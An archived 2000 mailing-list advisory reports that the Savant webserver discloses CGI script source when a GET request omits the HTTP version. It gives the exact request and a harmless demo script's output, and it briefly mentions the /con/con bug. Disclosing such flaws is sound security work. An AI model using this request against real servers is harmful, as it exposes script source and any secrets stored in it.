OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: MDMA Advisory #5: Reading of CGI Scripts under Savant Webserver
From: Drew (wizdumbLEET.ORG)
Date: Mon Jun 05 2000 - 03:34:07 CDT


MDMA Advisory #5 by Andrew Lewis aka. Wizdumb
Reading of CGI Scripts under Savant Webserver

It is possible to view the source of CGI scripts running under the Savant
Webserver by omitting the HTTP version from your request. For example, we
connect to port 80 of the server and type "GET /cgi-bin/mdma.bat HTTP/1.0"
followed by two enters, and the results are as follows...

------------------------------------------------
HTTP/1.0 200 OK
Pragma: no-cache
Content-type: text/html
Server: Savant

phjeeeer
------------------------------------------------

However, if we just type "GET /cgi-bin/mdma.bat" followed by two enters,
the results are as follows...

------------------------------------------------
echo off
rem CGI Script for demonstrating vulnerability
echo phjeeeer
------------------------------------------------

The vendor has been contacted and a fix is in the pipeline. Greetz to everyone
in MDMA, b0f, Vortexia, Blabber.Net's #hack, and everyone that knows me.

Cheers,
Andrew Lewis aka. Wizdumb

PS. Savant is also affected by the /con/con bug - as if you were expecting
otherwise ;-)

--==--==--==--==-->>
wizdumbleet.org
www.mdma.za.net/fk